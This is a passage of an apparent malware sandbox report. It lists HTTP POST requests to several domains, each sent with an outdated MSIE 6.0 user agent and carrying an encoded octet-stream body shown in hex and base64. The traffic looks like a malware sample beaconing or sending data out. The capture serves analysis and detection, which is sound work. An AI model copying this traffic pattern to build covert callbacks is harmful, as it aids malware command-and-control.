4c 55 61 2f 72 37 55 6c 7a 64 4d 6e 45 57 34 58 57 59 75 77 70 4c 46 66 59 6a 4b 2f 47 66 6d 72 76 32 71 6b 6d 4b 68 6f 2b 37 4a 2b 34 52 6c 75 48 56 31 48 55 6d 56 74 72 38 31 32 39 6d 35 41 6b 30 33 4d 56 48 66 4a 74 30 6f 53 2b 71 74 69 54 2f 34 4a 34 59 4f 58 73 6d 44 35 4c 6f 7a 44 66 72 71 39 4f 45 4f 79 4e 50 46 51 45 30 71 78 5a 34 3d Data Ascii: vsOf1992TxIk+a92Ptabb2jERfa1tEjrg0SlxJS9+N1STyScrMnwVLwS8PH4/9QGyFMaoP+cLELYuSaWCm5EojcdlSlCpq/WQjd56xGtOzlTVYMg8mCf4v1V0YMFMli20ZCqSaT8Ur9E5dNnkQqTxSMDPzE5MExdbn73YzMV0i6ReZv6d8W8VF2H8fXI6Xyi/iRebBJ25jEHBWhHLzNXRYgrTnIvD5gn8LeHwmCkKOuGNGGreojgGt1M29e3IBBmW07pNoxtRUxgnVLQeTzT87EvzlLriDgyjZiW/D+utgLB4aQvGLXdjdxBmsgRcqwf329yNrd1vL/Vbxm6vGr1DjznhY0akhb5soi/2BaC+7IdXAJvh5XKgyW92BJaoK2pPtknbe0u4q8lo3JUF9jymkK5fccebKjBW35NS7bEP+C24XYG52jgyLUa/r7UlzdMnEW4XWYuwpLFfYjK/Gfmrv2qkmKho+7J+4RluHV1HUmVtr8129m5Ak03MVHfJt0oS+qtiT/4J4YOXsmD5LozDfrq9OEOyNPFQE0qxZ4=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.quadlock.comCache-Control: no-cacheData Raw: 4c 55 6c 57 6e 59 72 69 56 52 4a 56 38 37 6e 6c 37 58 43 49 67 6b 31 4d 6e 44 4d 36 58 66 33 48 58 6f 31 44 65 70 70 74 71 35 30 74 4c 34 67 73 61 48 75 4c 48 76 43 30 7a 51 2f 58 6b 50 44 52 67 42 6d 51 35 39 34 42 34 41 6f 71 77 78 66 4d 32 38 5a 4f 63 54 49 36 7a 58 6a 44 49 6d 6b 46 4c 6e 74 76 4d 6c 78 31 54 35 71 6a 61 65 6e 42 6f 39 42 2f 74 78 71 59 32 36 6f 4d 52 6c 65 2b 43 79 37 56 50 55 39 35 71 6c 79 76 71 70 42 31 61 56 32 51 36 31 67 5a 45 62 57 50 76 6f 59 72 58 7a 4d 65 34 44 32 67 61 43 35 34 30 30 55 4a 4b 39 38 57 6e 42 67 34 4b 50 58 53 71 72 55 50 70 62 52 79 5a 6c 7a 70 5a 31 5a 34 46 2f 4d 73 6c 48 31 67 36 68 36 2b 44 4f 6f 4d 36 77 6a 36 64 6d 59 4c 48 44 50 6e 6d 5a 79 72 4f 58 33 54 41 72 33 67 54 65 6a 52 34 56 73 4f 66 74 4b 78 70 6c 4f 62 4d 41 64 4f 47 50 6f 67 39 55 45 6c 30 74 4c 79 37 41 74 48 33 32 78 43 37 58 5a 69 4f 4a 58 68 54 46 52 57 6a 47 53 31 61 63 50 41 67 34 39 4f 30 38 46 53 78 65 62 6c 77 77 67 72 5a 39 71 49 59 42 45 72 66 66 6c 48 6b 78 45 67 75 5a 48 6a 33 6c 46 67 35 74 62 63 35 78 45 6c 44 30 31 79 6a 57 55 63 43 77 57 79 6f 6b 33 62 30 61 39 57 39 31 64 4d 61 59 64 61 65 73 68 2f 62 4b 69 6b 53 2b 75 6f 72 50 68 51 4e 44 68 58 51 70 78 42 70 58 59 51 48 62 7a 6d 68 55 62 30 50 77 72 46 53 6c 4a 54 7a 62 64 72 64 37 69 4b 66 59 68 64 6b 7a 39 46 79 56 66 68 78 58 35 6d 34 2b 4e 74 6a 53 61 6d 4c 59 52 78 4b 5a 53 33 69 30 4c 67 4b 41 35 4e 4c 6e 69 50 57 72 52 4c 50 75 42 33 74 35 54 6e 38 52 42 64 38 64 48 63 51 41 70 43 36 37 47 66 31 44 67 42 68 49 44 42 42 4f 35 6f 6b 38 67 2f 41 4b 70 74 73 65 38 46 41 57 49 7a 61 4d 2f 36 4c 35 45 4b 2f 4b 67 7a 38 79 71 77 50 67 35 63 6e 66 50 38 71 67 51 78 74 30 32 68 78 41 56 65 62 72 47 52 41 33 6e 48 49 77 3d 3d Data Ascii: LUlWnYriVRJV87nl7XCIgk1MnDM6Xf3HXo1Depptq50tL4gsaHuLHvC0zQ/XkPDRgBmQ594B4AoqwxfM28ZOcTI6zXjDImkFLntvMlx1T5qjaenBo9B/txqY26oMRle+Cy7VPU95qlyvqpB1aV2Q61gZEbWPvoYrXzMe4D2gaC5400UJK98WnBg4KPXSqrUPpbRyZlzpZ1Z4F/MslH1g6h6+DOoM6wj6dmYLHDPnmZyrOX3TAr3gTejR4VsOftKxplObMAdOGPog9UEl0tLy7AtH32xC7XZiOJXhTFRWjGS1acPAg49O08FSxeblwwgrZ9qIYBErfflHkxEguZHj3lFg5tbc5xElD01yjWUcCwWyok3b0a9W91dMaYdaesh/bKikS+uorPhQNDhXQpxBpXYQHbzmhUb0PwrFSlJTzbdrd7iKfYhdkz9FyVfhxX5m4+NtjSamLYRxKZS3i0LgKA5NLniPWrRLPuB3t5Tn8RBd8dHcQApC67Gf1DgBhIDBBO5ok8g/AKptse8FAWIzaM/6L5EK/Kgz8yqwPg5cnfP8qgQxt02hxAVebrGRA3nHIw==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pdqhomes.comCache-Control: no-cacheData Raw: 4d 67 59 77 57 66 6d 72 55 78 4b 64 6d 70 6e 70 69 4f 57 45 54 4a 49 75 30 6d 2f 58 6f 44 67 43 50 63 34 38 6c 71 70 46 41 56 72 72 77 48 61 39 61 73 50 52 74 52 73 57 4e 4e 6d 55 57 35 79 4f 6d 56 57 6a 41 67 6e 70 72 7a 7a 6b 53 39 65 34 70 52 45 74 67 33 66 44 4d 47 65 74 4c 4e 58 59 58 77 71 74 53 79 56 6f 53 7a 69 35 37 4f 7a 46 67 6d 7a 69 6a 72 33 70 6d 74 46 59 71 45 71 42 5a 2b 62 58 4e 39 53 55 6c 61 4e 39 54 32 2f 68 57 66 55 37 61 75 4d 35 76 58 72 35 4a 44 36 77 66 41 74 66 52 31 61 6f 7a 30 6b 70 4d 34 7a 6d 7a 58 39 71 37 30 75 36 30 39 44 71 66 47 37 6d 38 57 76 51 49 57 77 79 76 4b 54 47 68 48 42 4b 4c 73 59 4b 6e 61 43 7a 78 62 52 2f 6e 38 56 77 5a 2b 71 74 77 38 67 53 41 73 43 67 4b 6e 2b 51 61 4a 55 34 42 57 47 76 31 4a 62 36 54 6a 4e 48 53 34 33 73 2b 4c 35 58 44 69 62 45 36 59 32 47 79 71 6c 4e 38 4b 4c 45 44 2b 6c 54 6c 33 46 5a 78 4d 48 65 75 79 41 59 4c 57 6f 77 79 2b 57 6b 66 47 67 30 6b 71 4c 74 6c 4c 77 33 51 45 30 47 65 70 6b 68 61 6b 78 4c 39 75 78 30 38 4f 61 4c 2f 47 47 73 4e 73 2b 4a 6e 30 61 2b 79 68 4b 34 79 71 48 45 2f 52 4e 4c 6f 6c 36 79 51 6c 72 50 78 4a 69 38 76 76 47 6a 51 38 49 59 70 77 54 6c 31 65 37 43 2b 49 51 5a 6c 5a 6f 56 7a 70 4f 2b 73 4f 67 79 32 73 46 70 74 57 75 31 33 78 76 33 64 72 67 71 4c 6c 78 46 6d 48 74 4a 75 35 6f 69 76 6e 49 79 41 72 6f 71 36 4c 46 75 4b 53 4b 5a 4d 6c 75 63 6a 55 78 4d 69 56 72 6a 70 51 42 48 53 2b 71 46 55 6d 55 4f 6f 59 43 4a 55 72 4a 77 65 4c 45 73 61 79 32 77 45 64 46 6e 6f 39 4f 45 66 62 76 56 32 59 30 46 4d 50 71 39 69 37 54 70 54 6b 4d 6f 69 66 59 74 63 69 66 56 55 33 46 61 6a 66 72 56 72 58 37 56 37 71 49 79 42 47 76 57 35 67 79 72 74 46 56 2b 53 4c 73 56 79 37 4e 65 39 2f 49 4e 49 79 63 30 30 45 6f 54 35 6b 61 55 74 72 4c 72 73 39 36 44 31 4e 4e 70 44 2f 6d 55 Data Ascii: MgYwWfmrUxKdmpnpiOWETJIu0m/XoDgCPc48lqpFAVrrwHa9asPRtRsWNNmUW5yOmVWjAgnprzzkS9e4pREtg3fDMGetLNXYXwqtSyVoSzi57OzFgmzijr3pmtFYqEqBZ+bXN9SUlaN9T2/hWfU7auM5vXr5JD6wfAtfR1aoz0kpM4zmzX9q70u609DqfG7m8WvQIWwyvKTGhHBKLsYKnaCzxbR/n8VwZ+qtw8gSAsCgKn+QaJU4BWGv1Jb6TjNHS43s+L5XDibE6Y2GyqlN8KLED+lTl3FZxMHeuyAYLWowy+WkfGg0kqLtlLw3QE0GepkhakxL9ux08OaL/GGsNs+Jn0a+yhK4yqHE/RNLol6yQlrPxJi8vvGjQ8IYpwTl1e7C+IQZlZoVzpO+sOgy2sFptWu13xv3drgqLlxFmHtJu5oivnIyAroq6LFuKSKZMlucjUxMiVrjpQBHS+qFUmUOoYCJUrJweLEsay2wEdFno9OEfbvV2Y0FMPq9i7TpTkMoifYtcifVU3FajfrVrX7V7qIyBGvW5gyrtFV+SLsVy7Ne9/INIyc00EoT5kaUtrLrs96D1NNpD/mU
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pr-park.comCache-Control: no-cacheData Raw: 4e 56 4f 76 63 65 7a 48 58 42 4b 56 70 68 46 41 31 79 4c 5a 71 50 2f 78 43 4b 35 45 34 2b 68 33 34 43 64 34 6c 48 38 74 65 76 57 71 6c 63 70 4c 59 58 33 61 47 4b 52 7a 35 6b 49 51 75 51 70 4a 55 36 34 72 4d 41 2f 6c 45 58 79 57 6a 63 49 32 58 69 6f 39 76 69 56 48 4a 78 30 35 53 50 57 73 74 39 52 56 38 57 43 79 63 72 31 33 58 37 68 4c 4b 36 65 33 6b 54 51 39 66 69 6b 44 54 2b 53 7a 67 41 50 42 38 47 2b 6b 6a 47 63 59 63 64 37 54 44 68 59 47 6d 62 4b 66 30 39 36 77 39 66 63 76 33 50 5a 77 4e 38 46 71 33 7a 51 31 71 57 43 45 42 43 72 57 78 52 62 33 6d 48 75 50 65 43 2b 51 51 72 46 56 73 59 33 63 64 39 30 50 6e 4d 2b 44 4a 32 4c 55 61 47 73 58 31 54 75 34 66 6f 4f 36 67 76 63 41 34 30 70 62 79 48 4e 43 43 31 32 53 34 77 77 4f 79 47 45 46 58 6e 4e 35 53 63 65 6b 6b 54 41 50 6a 5a 6f 34 6c 2f 4e 30 62 73 69 35 6c 39 30 79 2f 79 75 4c 5a 33 41 2b 4a 54 36 7a 36 73 44 72 54 4e 70 4a 6f 72 55 73 35 56 62 56 51 32 2b 6c 57 33 59 7a 64 59 6d 47 52 46 74 63 73 6b 6b 44 32 74 45 59 6b 70 54 2b 4e 2f 68 44 43 6e 73 55 41 79 75 4f 56 56 6c 4e 54 58 70 66 65 45 6b 34 5a 37 2b 4a 5a 75 41 68 64 47 54 4d 6f 6c 57 48 57 49 39 52 36 6b 52 71 6a 69 73 4e 39 4a 30 39 4b 74 77 77 4d 46 63 45 48 75 58 51 79 4d 49 4f 65 6e 54 65 58 68 41 61 44 2b 4c 4f 74 50 4c 4f 6e 64 46 47 6a 2b 33 6c 45 71 64 6a 2b 6b 53 63 4e 70 47 63 70 38 41 55 57 63 74 43 41 45 79 5a 4c 6d 6e 32 52 2b 79 77 67 66 45 58 69 71 4e 6c 31 79 74 71 63 59 55 4e 61 61 4c 50 2f 2f 6e 4b 62 4d 69 41 43 2b 74 6c 7a 58 64 57 56 73 56 61 45 4c 45 6c 58 48 70 57 69 78 30 6d 6f 2b 38 71 71 2b 33 4d 6a 6c 44 30 78 33 72 63 65 34 37 6d 56 43 65 79 71 61 67 64 73 66 55 62 68 4d 78 48 63 2b 79 52 39 54 48 5a Data Ascii: NVOvcezHXBKVphFA1yLZqP/xCK5E4+h34Cd4lH8tevWqlcpLYX3aGKRz5kIQuQpJU64rMA/lEXyWjcI2Xio9viVHJx05SPWst9RV8WCycr13X7hLK6e3kTQ9fikDT+SzgAPB8G+kjGcYcd7TDhYGmbKf096w9fcv3PZwN8Fq3zQ1qWCEBCrWxRb3mHuPeC+QQrFVsY3cd90PnM+DJ2LUaGsX1Tu4foO6gvcA40pbyHNCC12S4wwOyGEFXnN5ScekkTAPjZo4l/N0bsi5l90y/yuLZ3A+JT6z6sDrTNpJorUs5VbVQ2+lW3YzdYmGRFtcskkD2tEYkpT+N/hDCnsUAyuOVVlNTXpfeEk4Z7+JZuAhdGTMolWHWI9R6kRqjisN9J09KtwwMFcEHuXQyMIOenTeXhAaD+LOtPLOndFGj+3lEqdj+kScNpGcp8AUWctCAEyZLmn2R+ywgfEXiqNl1ytqcYUNaaLP//nKbMiAC+tlzXdWVsVaELElXHpWix0mo+8qq+3MjlD0x3rce47mVCeyqagdsfUbhMxHc+yR9THZ
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.baijaku.comCache-Control: no-cacheData Raw: 58 7a 36 64 52 2b 41 5a 55 78 4c 32 75 6b 47 4d 4d 34 50 57 7a 52 4f 38 65 41 5a 49 72 67 30 38 46 4c 39 45 49 32 38 34 76 64 71 6d 35 71 4b 34 57 39 61 77 48 56 50 32 4d 50 35 4c 69 72 48 41 2b 46 37 55 59 58 4e 74 76 4c 74 6c 54 45 54 4d 52 70 51 57 71 4d 76 34 37 68 48 4f 52 52 38 68 4b 4b 61 65 48 34 6b 36 32 48 52 5a 58 31 6a 4d 41 44 5a 56 51 77 58 31 39 50 49 70 4e 30 39 5a 62 6a 69 56 42 6b 77 31 6e 63 30 2f 64 4b 59 54 30 51 51 78 55 46 61 67 35 65 43 50 4a 65 4a 72 4a 33 7a 77 2f 66 76 41 30 70 4c 66 75 72 58 56 6f 79 63 59 77 6e 6e 4e 32 77 5a 78 34 45 65 4e 55 77 6d 42 31 68 54 6e 6d 54 6c 49 41 45 4e 56 74 6e 36 70 30 73 78 46 56 53 77 36 6a 6e 39 56 4b 5a 58 54 45 76 44 52 43 33 31 71 68 58 31 6a 54 55 2f 6f 4d 62 49 62 33 74 51 42 62 62 6d 6b 6c 2f 48 2f 64 68 55 55 51 73 5a 55 44 6f 48 4d 4b 74 64 57 66 71 44 4a 57 4a 51 71 79 6f 67 70 77 4e 6f 55 64 42 62 6d 41 42 41 6a 68 76 50 79 2f 47 7a 5a 4e 64 52 4b 4c 41 6c 42 66 42 66 56 6a 31 43 5a 33 4e 64 31 73 31 44 62 48 71 6e 78 6e 43 61 66 30 76 55 6f 4b 45 77 39 68 75 6e 37 61 4a 37 2f 61 4f 5a 54 6e 62 58 77 4b 5a 68 6f 2b 4c 76 50 53 51 47 56 44 48 6f 37 39 43 35 4e 53 36 31 4e 2b 77 63 30 7a 42 2b 66 6a 61 35 72 50 66 39 79 69 67 45 6e 35 61 41 6a 4e 6e 6b 4a 37 56 6e 41 4e 59 36 4e 6c 7a 7a 78 6b 63 33 74 75 59 46 30 72 78 36 64 79 43 4f 78 64 2f 33 6f 50 55 2f 76 56 78 75 39 30 75 6d 6d 76 34 62 78 43 51 69 4a 76 4b 5a 4e 76 4b 67 68 47 36 5a 32 77 6a 46 52 4a 75 39 32 63 58 6c 6f 77 4d 62 6c 41 58 37 72 4e 4c 4f 4d 71 58 41 48 71 37 72 6b 41 67 66 37 38 63 6f 6c 64 50 63 4a 61 2b 35 79 35 63 38 78 4e 6c 71 6f 49 74 6f 63 59 49 6c 63 6b 6c 4a 6b 47 49 6e 33 57 59 4e 4d 4e 36 31 4f 49 46 49 3d Data Ascii: Xz6dR+AZUxL2ukGMM4PWzRO8eAZIrg08FL9EI284vdqm5qK4W9awHVP2MP5LirHA+F7UYXNtvLtlTETMRpQWqMv47hHORR8hKKaeH4k62HRZX1jMADZVQwX19PIpN09ZbjiVBkw1nc0/dKYT0QQxUFag5eCPJeJrJ3zw/fvA0pLfurXVoycYwnnN2wZx4EeNUwmB1hTnmTlIAENVtn6p0sxFVSw6jn9VKZXTEvDRC31qhX1jTU/oMbIb3tQBbbmkl/H/dhUUQsZUDoHMKtdWfqDJWJQqyogpwNoUdBbmABAjhvPy/GzZNdRKLAlBfBfVj1CZ3Nd1s1DbHqnxnCaf0vUoKEw9hun7aJ7/aOZTnbXwKZho+LvPSQGVDHo79C5NS61N+wc0zB+fja5rPf9yigEn5aAjNnkJ7VnANY6Nlzzxkc3tuYF0rx6dyCOxd/3oPU/vVxu90ummv4bxCQiJvKZNvKghG6Z2wjFRJu92cXlowMblAX7rNLOMqXAHq7rkAgf78coldPcJa+5y5c8xNlqoItocYIlcklJkGIn3WYNMN61OIFI=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.wkhk.netCache-Control: no-cacheCookie: snkz=102.129.145.68; btst=7c489d07d4bbd4acbdcfa0d52de1d34d|102.129.145.68|1696859405|1696859405|0|1|0Data Raw: 32 6b 71 34 67 54 4e 4e 58 52 4a 75 7a 70 49 73 65 6a 44 70 34 64 78 78 7a 6d 61 5a 69 36 6b 48 46 37 61 57 69 6c 35 56 50 70 4c 53 48 6e 77 6e 73 74 75 63 50 77 49 75 77 6d 50 53 43 41 53 6f 42 36 57 41 73 42 74 7a 6b 5a 6e 52 53 4f 61 39 51 4f 46 53 6c 67 66 67 44 44 37 57 42 41 6d 46 46 41 6c 37 4d 73 4a 4c 78 6e 61 31 46 38 35 50 5a 64 43 4d 76 4f 6e 54 67 5a 73 31 45 79 79 2f 4e 64 35 32 4b 36 69 61 53 6e 43 41 4a 59 66 4c 43 47 46 6d 7a 4a 49 55 42 62 48 78 52 64 68 57 31 50 72 4a 6e 62 4a 5a 7a 44 73 69 42 59 6f 70 53 78 56 67 49 36 6d 50 2f 58 52 39 31 45 4a 45 74 78 36 47 66 46 38 39 4d 67 6e 4c 53 79 64 33 50 78 7a 79 48 72 34 36 61 53 7a 6b 57 65 46 63 42 6e 70 4a 66 52 37 63 6d 61 34 43 6b 77 69 6e 72 70 69 6a 6e 79 70 6e 73 4a 4b 6b 4c 4f 36 6a 7a 78 61 62 4f 58 68 68 4f 39 6a 63 32 55 7a 69 45 73 7a 70 34 41 2b 47 74 64 44 54 4a 38 78 33 48 4f 70 73 75 30 79 6d 63 31 39 48 39 68 67 61 70 49 6e 44 43 6a 6f 2f 44 33 4f 4f 48 77 32 67 65 78 4f 77 56 47 49 63 46 43 56 56 56 4a 53 59 42 76 35 45 38 63 53 5a 49 4f 5a 58 4c 36 39 67 78 55 6b 66 35 33 48 42 33 6f 31 38 6f 4a 2b 4f 2f 49 49 56 59 6b 43 37 2b 6e 5a 7a 31 70 51 6a 6d 63 56 43 79 61 69 7a 79 63 49 77 46 2f 51 66 38 4d 42 6e 31 78 69 69 5a 6a 4d 6f 50 30 34 51 4a 4a 55 6c 6e 64 38 36 65 56 36 4a 57 31 4f 52 75 31 79 46 70 4d 34 43 66 6d 56 4b 2f 53 62 38 4c 79 59 6a 64 4a 50 78 48 71 67 6b 49 39 59 76 63 6b 67 66 67 4e 42 37 36 43 68 38 68 54 2b 50 6e 44 55 6d 38 7a 63 4c 4b 62 6b 6a 2f 4f 57 68 6a 49 56 4e 77 32 51 45 4f 75 7a 69 2f 34 65 54 5a 58 53 58 36 59 61 4a 43 75 64 77 46 55 50 63 52 42 74 72 38 5a 65 4a 6d 38 71 47 63 2b 79 32 Data Ascii: 2kq4gTNNXRJuzpIsejDp4dxxzmaZi6kHF7aWil5VPpLSHnwnstucPwIuwmPSCASoB6WAsBtzkZnRSOa9QOFSlgfgDD7WBAmFFAl7MsJLxna1F85PZdCMvOnTgZs1Eyy/Nd52K6iaSnCAJYfLCGFmzJIUBbHxRdhW1PrJnbJZzDsiBYopSxVgI6mP/XR91EJEtx6GfF89MgnLSyd3PxzyHr46aSzkWeFcBnpJfR7cma4CkwinrpijnypnsJKkLO6jzxabOXhhO9jc2UziEszp4A+GtdDTJ8x3HOpsu0ymc19H9hgapInDCjo/D3OOHw2gexOwVGIcFCVVVJSYBv5E8cSZIOZXL69gxUkf53HB3o18oJ+O/IIVYkC7+nZz1pQjmcVCyaizycIwF/Qf8MBn1xiiZjMoP04QJJUlnd86eV6JW1ORu1yFpM4CfmVK/Sb8LyYjdJPxHqgkI9YvckgfgNB76Ch8hT+PnDUm8zcLKbkj/OWhjIVNw2QEOuzi/4eTZXSX6YaJCudwFUPcRBtr8ZeJm8qGc+y2
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.olras.comCache-Control: no-cacheData Raw: 79 52 57 30 39 4e 79 34 57 42 4c 32 77 44 42 79 42 2f 34 54 6b 6d 39 41 63 58 72 30 54 6d 55 52 30 43 38 45 4f 71 6c 64 6c 44 58 6d 47 2f 48 2f 4f 2b 76 64 41 2b 36 41 6a 64 53 36 63 38 33 71 5a 74 46 35 2b 48 58 69 72 6c 51 7a 4c 39 30 6c 50 5a 6e 76 54 6e 2f 46 71 46 66 65 37 6a 35 35 70 4a 65 46 52 57 38 66 56 55 58 47 55 64 65 73 2b 6a 30 2f 77 38 68 4f 2b 47 78 61 56 36 35 67 57 6d 38 6e 76 2f 2b 2f 48 52 5a 69 4c 4b 38 30 70 2f 64 49 43 52 33 39 79 78 6b 34 6b 53 72 42 53 39 65 43 4c 30 31 67 6e 59 54 5a 39 75 74 6e 55 77 41 4d 35 62 43 2b 69 62 65 75 54 2b 41 6a 56 6c 57 6c 66 50 31 6a 50 4c 38 51 6e 61 75 57 52 59 4d 54 2b 57 74 37 6b 31 78 4d 46 42 41 39 53 67 45 73 78 4d 39 36 48 47 4f 4e 75 58 6d 39 76 51 78 43 4c 61 47 4d 50 4f 49 65 69 79 6a 67 57 53 68 73 61 35 57 4b 61 34 75 73 66 42 45 4e 65 45 7a 32 56 4b 45 37 57 31 32 53 52 53 47 51 59 71 6f 56 39 4f 61 67 58 68 4f 79 6e 4c 37 49 2f 33 73 6b 73 6a 78 2f 33 69 2f 41 42 4d 6a 35 75 4b 4e 50 4c 43 2f 73 71 55 54 30 65 5a 56 75 34 71 47 6c 51 44 41 4c 76 78 38 51 6d 6b 4d 33 51 56 64 77 73 76 66 2f 34 54 39 4f 35 65 54 58 78 36 65 6e 6c 4e 2f 36 74 6b 63 78 73 4b 70 76 41 32 74 6b 6f 6f 51 6a 4d 74 57 76 72 67 35 67 6e 73 72 58 62 70 43 54 6e 62 62 6d 4d 50 48 68 4b 6f 47 5a 68 5a 6e 62 6b 33 4d 47 76 66 4a 6e 68 34 74 43 72 43 79 30 5a 69 33 41 44 58 74 4c 6e 37 2f 2f 53 63 6f 6b 49 6f 38 69 4b 70 63 5a 67 30 53 50 74 6d 48 61 50 43 37 46 48 2f 2f 61 4e 51 73 38 73 43 66 51 56 43 56 62 77 74 31 52 58 43 4f 55 57 37 42 4f 46 56 35 58 57 30 49 4b 78 43 56 79 59 69 2b 58 47 57 6f 42 59 77 4b 62 4a 55 50 78 7a 67 77 52 37 78 58 4e 4f 6f 35 2b 57 47 61 53 6e 4d 4f 6d 6c 74 33 61 6d 75 39 2b 76 49 73 70 55 61 33 43 4c 51 74 43 69 33 67 63 51 6a 6f 49 70 67 3d 3d Data Ascii: yRW09Ny4WBL2wDByB/4Tkm9AcXr0TmUR0C8EOqldlDXmG/H/O+vdA+6AjdS6c83qZtF5+HXirlQzL90lPZnvTn/FqFfe7j55pJeFRW8fVUXGUdes+j0/w8hO+GxaV65gWm8nv/+/HRZiLK80p/dICR39yxk4kSrBS9eCL01gnYTZ9utnUwAM5bC+ibeuT+AjVlWlfP1jPL8QnauWRYMT+Wt7k1xMFBA9SgEsxM96HGONuXm9vQxCLaGMPOIeiyjgWShsa5WKa4usfBENeEz2VKE7W12SRSGQYqoV9OagXhOynL7I/3sksjx/3i/ABMj5uKNPLC/sqUT0eZVu4qGlQDALvx8QmkM3QVdwsvf/4T9O5eTXx6enlN/6tkcxsKpvA2tkooQjMtWvrg5gnsrXbpCTnbbmMPHhKoGZhZnbk3MGvfJnh4tCrCy0Zi3ADXtLn7//ScokIo8iKpcZg0SPtmHaPC7FH//aNQs8sCfQVCVbwt1RXCOUW7BOFV5XW0IKxCVyYi+XGWoBYwKbJUPxzgwR7xXNOo5+WGaSnMOmlt3amu9+vIspUa3CLQtCi3gcQjoIpg==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 76 73 4f 66 31 39 39 32 54 78 49 6b 2b 61 39 32 50 74 61 62 62 32 6a 45 52 66 61 31 74 45 6a 72 67 30 53 6c 78 4a 53 39 2b 4e 31 53 54 79 53 63 72 4d 6e 77 56 4c 77 53 38 50 48 34 2f 39 51 47 79 46 4d 61 6f 50 2b 63 4c 45 4c 59 75 53 61 57 43 6d 35 45 6f 6a 63 64 6c 53 6c 43 70 71 2f 57 51 6a 64 35 36 78 47 74 4f 7a 6c 54 56 59 4d 67 38 6d 43 66 34 76 31 56 30 59 4d 46 4d 6c 69 32 30 5a 43 71 53 61 54 38 55 72 39 45 35 64 4e 6e 6b 51 71 54 78 53 4d 44 50 7a 45 35 4d 45 78 64 62 6e 37 33 59 7a 4d 56 30 69 36 52 65 5a 76 36 64 38 57 38 56 46 32 48 38 66 58 49 36 58 79 69 2f 69 52 65 62 42 4a 32 35 6a 45 48 42 57 68 48 4c 7a 4e 58 52 59 67 72 54 6e 49 76 44 35 67 6e 38 4c 65 48 77 6d 43 6b 4b 4f 75 47 4e 47 47 72 65 6f 6a 67 47 74 31 4d 32 39 65 33 49 42 42 6d 57 30 37 70 4e 6f 78 74 52 55 78 67 6e 56 4c 51 65 54 7a 54 38 37 45 76 7a 6c 4c 72 69 44 67 79 6a 5a 69 57 2f 44 2b 75 74 67 4c 42 34 61 51 76 47 4c 58 64 6a 64 78 42 6d 73 67 52 63 71 77 66 33 32 39 79 4e 72 64 31 76 4c 2f 56 62 78 6d 36 76 47 72 31 44 6a 7a 6e 68 59 30 61 6b 68 62 35 73 6f 69 2f 32 42 61 43 2b 37 49 64 58 41 4a 76 68 35 58 4b 67 79 57 39 32 42 4a 61 6f 4b 32 70 50 74 6b 6e 62 65 30 75 34 71 38 6c 6f 33 4a 55 46 39 6a 79 6d 6b 4b 35 66 63 63 65 62 4b 6a 42 57 33 35 4e 53 37 62 45 50 2b 43 32 34 58 59 47 35 32 6a 67 79 4c 55 61 2f 72 37 55 6c 7a 64 4d 6e 45 57 34 58 57 59 75 77 70 4c 46 66 59 6a 4b 2f 47 66 6d 72 76 32 71 6b 6d 4b 68 6f 2b 37 4a 2b 34 52 6c 75 48 56 31 48 55 6d 56 74 72 38 31 32 39 6d 35 41 6b 30 33 4d 56 48 66 4a 74 30 6f 53 2b 71 74 69 54 2f 34 4a 34 59 4f 58 73 6d 44 35 4c 6f 7a 44 66 72 71 39 4f 45 4f 79 4e 50 46 51 45 30 71 78 5a 34 3d Data Ascii: vsOf1992TxIk+a92Ptabb2jERfa1tEjrg0SlxJS9+N1STyScrMnwVLwS8PH4/9QGyFMaoP+cLELYuSaWCm5EojcdlSlCpq/WQjd56xGtOzlTVYMg8mCf4v1V0YMFMli20ZCqSaT8Ur9E5dNnkQqTxSMDPzE5MExdbn73YzMV0i6ReZv6d8W8VF2H8fXI6Xyi/iRebBJ25jEHBWhHLzNXRYgrTnIvD5gn8LeHwmCkKOuGNGGreojgGt1M29e3IBBmW07pNoxtRUxgnVLQeTzT87EvzlLriDgyjZiW/D+utgLB4aQvGLXdjdxBmsgRcqwf329yNrd1vL/Vbxm6vGr1DjznhY0akhb5soi/2BaC+7IdXAJvh5XKgyW92BJaoK2pPtknbe0u4q8lo3JUF9jymkK5fccebKjBW35NS7bEP+C24XYG52jgyLUa/r7UlzdMnEW4XWYuwpLFfYjK/Gfmrv2qkmKho+7J+4RluHV1HUmVtr8129m5Ak03MVHfJt0oS+qtiT/4J4YOXsmD5LozDfrq9OEOyNPFQE0qxZ4=
